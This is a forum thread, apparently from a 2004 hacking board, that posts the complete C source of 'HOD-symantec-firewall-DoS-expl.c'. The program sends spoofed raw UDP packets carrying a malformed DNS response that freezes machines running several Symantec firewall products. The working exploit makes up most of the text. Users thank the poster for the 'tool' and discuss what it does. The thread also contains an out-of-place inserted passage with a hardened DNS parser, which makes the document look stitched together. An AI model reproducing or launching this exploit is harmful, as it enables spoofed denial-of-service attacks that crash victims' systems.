Anarchy
CODE
/* HOD-symantec-firewall-DoS-expl.c:
*
* Symantec Multiple Firewall DNS Response Denial-of-Service
*
* Exploit version 0.1 coded by
*
*
*                 .::[ houseofdabus ]::.
*
*
*
* Bug discovered by eEye:
* http://www.eeye.com/html/Research/Advisories/AD20040512B.html
*
* -------------------------------------------------------------------
* Tested on:
*    - Symantec Norton Personal Firewall 2004
*
*
* Systems Affected:
*    - Symantec Norton Internet Security 2002
*    - Symantec Norton Internet Security 2003
*    - Symantec Norton Internet Security 2004
*    - Symantec Norton Internet Security Professional 2002
*    - Symantec Norton Internet Security Professional 2003
*    - Symantec Norton Internet Security Professional 2004
*    - Symantec Norton Personal Firewall 2002
*    - Symantec Norton Personal Firewall 2003
*    - Symantec Norton Personal Firewall 2004
*    - Symantec Client Firewall 5.01, 5.1.1
*    - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
*    - Symantec Norton AntiSpam 2004
*
* -------------------------------------------------------------------
* Description:
*    eEye Digital Security has discovered a second vulnerability
*    in the Symantec firewall product line that can be remotely
*    exploited to cause a severe denial-of-service condition on
*    systems running a default installation of an affected version
*    of the product. By sending a single malicious DNS (UDP port 53)
*    response packet to a vulnerable host, an attacker can cause
*    the Symantec DNS response validation code to enter an infinite
*    loop within the kernel, amounting to a system freeze that requires
*    the machine to be physically rebooted in order to restore operation.
*
* -------------------------------------------------------------------
* Compile:
*    Win32/VC++  : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
*    Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32
*    Linux       : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
*    HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]
*
*           -fi:IP    From (sender) IP address
*           -tp:int   To (recipient) port number
*           -ti:IP    To (recipient) IP address
*           -n:int    Number of times to send message
*
*/


#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <ws2tcpip.h> /* IP_HDRINCL */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memcpy, memset, strlen */
#include <ctype.h>    /* tolower */

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
#include <string.h>
#include <ctype.h>    /* tolower */
#include <unistd.h>   /* close */
#endif

#define MAX_MESSAGE        4068
#define MAX_PACKET         4096

#define DEFAULT_PORT       53
#define DEFAULT_IP         "10.0.0.1"
#define DEFAULT_COUNT      1

#ifndef _WIN32
#       define FAR
#endif


/* Define the DNS header */
char dnsreply[] =
"\xc9\x9c"  /* Transaction ID */
"\x80\x00"  /* Flags (bit 15: response) */
"\x00\x01"  /* Number of questions */
"\x00\x01"  /* Number of answer RRs */
"\x00\x00"  /* Number of authority RRs */
"\x00\x00"  /* Number of additional RRs */
"\xC0\x0C"; /* Compressed name pointer to itself */


/* Define the IP header */
typedef struct ip_hdr {
   unsigned char  ip_verlen;        /* IP version & length */
   unsigned char  ip_tos;           /* IP type of service */
   unsigned short ip_totallength;   /* Total length */
   unsigned short ip_id;            /* Unique identifier */
   unsigned short ip_offset;        /* Fragment offset field */
   unsigned char  ip_ttl;           /* Time to live */
   unsigned char  ip_protocol;      /* Protocol */
   unsigned short ip_checksum;      /* IP checksum */
   unsigned int   ip_srcaddr;       /* Source address */
   unsigned int   ip_destaddr;      /* Destination address */
} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

/* Define the UDP header */
typedef struct udp_hdr {
   unsigned short src_portno;       /* Source port number */
   unsigned short dst_portno;       /* Destination port number */
   unsigned short udp_length;       /* UDP packet length */
   unsigned short udp_checksum;     /* UDP checksum (optional) */
} UDP_HDR, *PUDP_HDR;


/* globals */
unsigned long  dwToIP,               /* IP to send to */
               dwFromIP;             /* IP to send from (spoof) */
unsigned short iToPort,              /* Port to send to */
               iFromPort;            /* Port to send from (spoof) */
unsigned long  dwCount;              /* Number of times to send */
char           strMessage[MAX_MESSAGE]; /* Message to send */



void
usage(char *progname) {
   printf("Usage:\n\n");
   printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname);
   printf("       -fi:IP    From (sender) IP address\n");
   printf("       -tp:int   To (recipient) open UDP port number:\n");
   printf("                 137, 138, 445, 500(default)\n");
   printf("       -ti:IP    To (recipient) IP address\n");
   printf("       -n:int    Number of times\n");
   exit(1);
}

void
ValidateArgs(int argc, char **argv)
{
   int                i;

   iToPort = 500;
   iFromPort = DEFAULT_PORT;
   dwToIP = inet_addr(DEFAULT_IP);
   dwFromIP = inet_addr(DEFAULT_IP);
   dwCount = DEFAULT_COUNT;
   memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

   for(i = 1; i < argc; i++) {
       if ((argv[i][0] == '-') || (argv[i][0] == '/')) {
           switch (tolower(argv[i][1])) {
               case 'f':
                   switch (tolower(argv[i][2])) {
                       case 'i':
                           if (strlen(argv[i]) > 4)
                               dwFromIP = inet_addr(&argv[i][4]);
                           break;
                       default:
                           usage(argv[0]);
                           break;
                   }    
                   break;
               case 't':
                   switch (tolower(argv[i][2])) {
                       case 'p':
                           if (strlen(argv[i]) > 4)
                               iToPort = atoi(&argv[i][4]);
                           break;
                       case 'i':
                           if (strlen(argv[i]) > 4)
                               dwToIP = inet_addr(&argv[i][4]);
                           break;
                       default:
                           usage(argv[0]);
                           break;
                   }    
                   break;
               case 'n':
                   if (strlen(argv[i]) > 3)
                       dwCount = atol(&argv[i][3]);
                   break;
               default:
                   usage(argv[0]);
                   break;
           }
       }
   }
   return;
}


/*    This function calculates the 16-bit one's complement sum */
/*    for the supplied buffer */
unsigned short
checksum(unsigned short *buffer, int size)
{
   unsigned long cksum=0;

   while (size > 1) {
       cksum += *buffer++;
       size  -= sizeof(unsigned short);  
   }
   if (size) {
       cksum += *(unsigned char *)buffer;  
   }
   cksum = (cksum >> 16) + (cksum & 0xffff);
   cksum += (cksum >>16);

   return (unsigned short)(~cksum);
}




int
main(int argc, char **argv)
{
#ifdef _WIN32
   WSADATA            wsd;
#endif
   int                s;
#ifdef _WIN32
   BOOL               bOpt;
#else
   int                bOpt;
#endif
   struct sockaddr_in remote;
   IP_HDR             ipHdr;
   UDP_HDR            udpHdr;
   int                ret;
   unsigned long      i;
   unsigned short     iTotalSize,
                      iUdpSize,
                      iUdpChecksumSize,
                      iIPVersion,
                      iIPSize,
                      cksum = 0;
   char               buf[MAX_PACKET],
                      *ptr = NULL;
#ifdef _WIN32
   IN_ADDR            addr;
#else
   struct sockaddr_in addr;
#endif

   printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n");
   printf("Bug discovered by eEye:\n");
   printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n");
   printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

   if (argc < 3) usage(argv[0]);

   /* Parse command line arguments and print them out */
   ValidateArgs(argc, argv);
#ifdef _WIN32
   addr.S_un.S_addr = dwFromIP;
   printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort);
   addr.S_un.S_addr = dwToIP;
   printf("[*] To   IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort);
   printf("[*] Count:   %lu\n", dwCount);
#else
   addr.sin_addr.s_addr = dwFromIP;
   printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort);
   addr.sin_addr.s_addr = dwToIP;
   printf("[*] To   IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort);
   printf("[*] Count:   %lu\n", dwCount);
#endif

#ifdef _WIN32
   if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
       printf("[-] WSAStartup() failed: %d\n", GetLastError());
       return -1;
   }
#endif
   /*  Creating a raw socket (needs administrator/root privileges) */
   s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
   if (s == INVALID_SOCKET) {
       printf("[-] WSASocket() failed: %d\n", WSAGetLastError());
       return -1;
   }
#else
   if (s < 0) {
       perror("[-] socket() failed");
       return -1;
   }
#endif

   /* Enable the IP header include option */
#ifdef _WIN32
   bOpt = TRUE;
#else
   bOpt = 1;
#endif
   ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
#ifdef _WIN32
   if (ret == SOCKET_ERROR) {
       printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
       return -1;
   }
#else
   if (ret < 0) {
       perror("[-] setsockopt(IP_HDRINCL) failed");
       return -1;
   }
#endif
   /* Initalize the IP header */
   iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1;

   iIPVersion = 4;
   /* IHL is the header length in 32-bit words (20 / 4 = 5); dividing by
      sizeof(unsigned long) gives 2 on LP64 systems, so use 4 explicitly */
   iIPSize = sizeof(ipHdr) / 4;

   ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
   ipHdr.ip_tos = 0;                         /* IP type of service */
   ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */
   ipHdr.ip_id = 0;                 /* Unique identifier: set to 0 */
   ipHdr.ip_offset = 0;             /* Fragment offset field */
   ipHdr.ip_ttl = 128;              /* Time to live */
   ipHdr.ip_protocol = 0x11;        /* Protocol(UDP) */
   ipHdr.ip_checksum = 0;          /* IP checksum */
   ipHdr.ip_srcaddr = dwFromIP;     /* Source address */
   ipHdr.ip_destaddr = dwToIP;      /* Destination address */

   /* Initalize the UDP header */
   iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1;

   udpHdr.src_portno = htons(iFromPort);
   udpHdr.dst_portno = htons(iToPort);
   udpHdr.udp_length = htons(iUdpSize);
   udpHdr.udp_checksum = 0;


   /* Build the UDP pseudo-header (src, dst, zero, protocol, length)
      followed by the UDP header and payload, then checksum it */
   iUdpChecksumSize = 0;
   ptr = buf;
   memset(buf, 0, MAX_PACKET);

   memcpy(ptr, &ipHdr.ip_srcaddr,  sizeof(ipHdr.ip_srcaddr));  
   ptr += sizeof(ipHdr.ip_srcaddr);
   iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr);

   memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr));
   ptr += sizeof(ipHdr.ip_destaddr);
   iUdpChecksumSize += sizeof(ipHdr.ip_destaddr);

   ptr++;
   iUdpChecksumSize += 1;

   memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol));
   ptr += sizeof(ipHdr.ip_protocol);
   iUdpChecksumSize += sizeof(ipHdr.ip_protocol);

   memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length));
   ptr += sizeof(udpHdr.udp_length);
   iUdpChecksumSize += sizeof(udpHdr.udp_length);
   
   memcpy(ptr, &udpHdr, sizeof(udpHdr));
   ptr += sizeof(udpHdr);
   iUdpChecksumSize += sizeof(udpHdr);

   for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++)
       *ptr = strMessage[i];
   iUdpChecksumSize += sizeof(dnsreply)-1;

   cksum = checksum((unsigned short *)buf, iUdpChecksumSize);
   udpHdr.udp_checksum = cksum;


   /* Now assemble the real packet: IP header, UDP header, DNS payload */
   memset(buf, 0, MAX_PACKET);
   ptr = buf;

   memcpy(ptr, &ipHdr, sizeof(ipHdr));   ptr += sizeof(ipHdr);
   memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr);
   memcpy(ptr, strMessage, sizeof(dnsreply)-1);

   remote.sin_family = AF_INET;
   remote.sin_port = htons(iToPort);
   remote.sin_addr.s_addr = dwToIP;
 
   for(i = 0; i < dwCount; i++) {
#ifdef _WIN32
       ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,
           sizeof(remote));

       if (ret == SOCKET_ERROR) {
           printf("[-] sendto() failed: %d\n", WSAGetLastError());
           break;
       }
#else
       ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,
           sizeof(remote));

       if (ret < 0) {
           perror("[-] sendto() failed");
           break;
       }
#endif
       printf("[+] sent %d bytes\n", ret);
   }

#ifdef _WIN32
   closesocket(s);
   WSACleanup();
#else
   close(s);
#endif

   return 0;
}
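The header comment above pins down the bug class: the "answer" in the DNS response is a compression pointer (\xC0\x0C) that refers to its own offset, and the firewall's response validation follows it forever. As an added example written for this thread (not houseofdabus's code and not anything from Symantec or eEye), here is the check such a validator needs. The function name dns_read_name and the two limits are assumptions of this example; every pointer must land strictly before every position already visited and the number of jumps is capped, so the self-referencing pointer is rejected rather than looped on.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define DNS_MAX_NAME 255   /* RFC 1035 limit on a whole name */
#define DNS_MAX_HOPS 16    /* cap on pointer jumps per name (assumed) */

/* Hypothetical hardened reader (added example) for the DNS name starting
 * at `off` in the `len`-byte message `pkt`. Writes the dotted name to `out`
 * and returns the number of wire bytes the name occupies at `off`, or -1 if
 * the name is malformed. A compression pointer (top two bits 11) is only
 * followed if it lands strictly before every position visited so far, and
 * at most DNS_MAX_HOPS are followed, so "\xC0\x0C" at offset 12 is rejected. */
int dns_read_name(const uint8_t *pkt, size_t len, size_t off,
                  char *out, size_t outlen)
{
    size_t pos = off, limit = off, outpos = 0, consumed = 0;
    int jumped = 0, hops = 0;

    for (;;) {
        if (pos >= len) return -1;               /* ran off the message */
        uint8_t lab = pkt[pos];
        if ((lab & 0xC0) == 0xC0) {              /* compression pointer */
            if (pos + 1 >= len) return -1;
            size_t target = ((size_t)(lab & 0x3F) << 8) | pkt[pos + 1];
            if (!jumped) consumed = pos + 2 - off;
            jumped = 1;
            /* strictly backwards, and a bounded number of jumps */
            if (target >= limit || ++hops > DNS_MAX_HOPS) return -1;
            limit = pos = target;
            continue;
        }
        if (lab & 0xC0) return -1;               /* 0x40/0x80: reserved */
        if (lab == 0) {                          /* root label: done */
            if (!jumped) consumed = pos + 1 - off;
            if (outpos >= outlen) return -1;
            out[outpos] = '\0';
            return (int)consumed;
        }
        if (pos + 1 + lab > len) return -1;      /* label runs past the end */
        if (outpos + lab + 1 > DNS_MAX_NAME || outpos + lab + 1 >= outlen)
            return -1;                           /* name or buffer too long */
        if (outpos) out[outpos++] = '.';
        memcpy(out + outpos, pkt + pos + 1, lab);
        outpos += lab;
        pos += 1 + lab;
    }
}
```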
midi69
thx a lot mate
does that just come with a shell?
didn't notice that
FLAT
No, if you had read the code of the exploit you would know that this is just a DDoS exploit... so just to (filtered) people
DevilM
But what if he doesn't know about reading the code? If he just read "exploit" and thought of "getting a shell" and stuff like that?
morbido
lol
this board is full of n00bs

getting a shell on a DOS
tweakz20
QUOTE (DevilM @ May 15 2004, 03:56 PM)
But what if he doesn't know about reading the code? If he just read "exploit" and thought of "getting a shell" and stuff like that?

um, the code is really long and just sitting there, don't you think people would get the impression "Wow. This is an exploit source for one of the major AV companies... Maybe I'll READ IT!"

anyway, i wonder how much these eEye guys get paid, these guys are such good programmers.... i don't get why they have the default port as
#define DEFAULT_IP "10.0.0.1"
though... shouldn't it just stop cold if no IP is given?
FiNaLBeTa
QUOTE (tweakz20 @ May 15 2004, 06:28 PM)
QUOTE (DevilM @ May 15 2004, 03:56 PM)
But what if he doesn't know about reading the code? If he just read "exploit" and thought of "getting a shell" and stuff like that?

um, the code is really long and just sitting there, don't you think people would get the impression "Wow. This is an exploit source for one of the major AV companies... Maybe I'll READ IT!"

anyway, i wonder how much these eEye guys get paid, these guys are such good programmers.... i don't get why they have the default port as
#define DEFAULT_IP "10.0.0.1"
though... shouldn't it just stop cold if no IP is given?

The advisory comes from eEye Security.
It does not say the code comes from them, though it could be.
Zero-X
well it seems that it's only gonna freeze the shit until they reboot...
tweakz20
* Exploit version 0.1 coded by
*
*
* .::[ houseofdabus ]::.

yeah, sorry, you're right... they're still really good programmers to find these vulnerabilities
xoro
Hi !

Thanks for this tool
Ecko
@tweakz20

#define DEFAULT_PORT 53
#define DEFAULT_IP "10.0.0.1"
#define DEFAULT_COUNT 1

it's only the default IP and port... if you choose another then it's another

but why enter your own IP?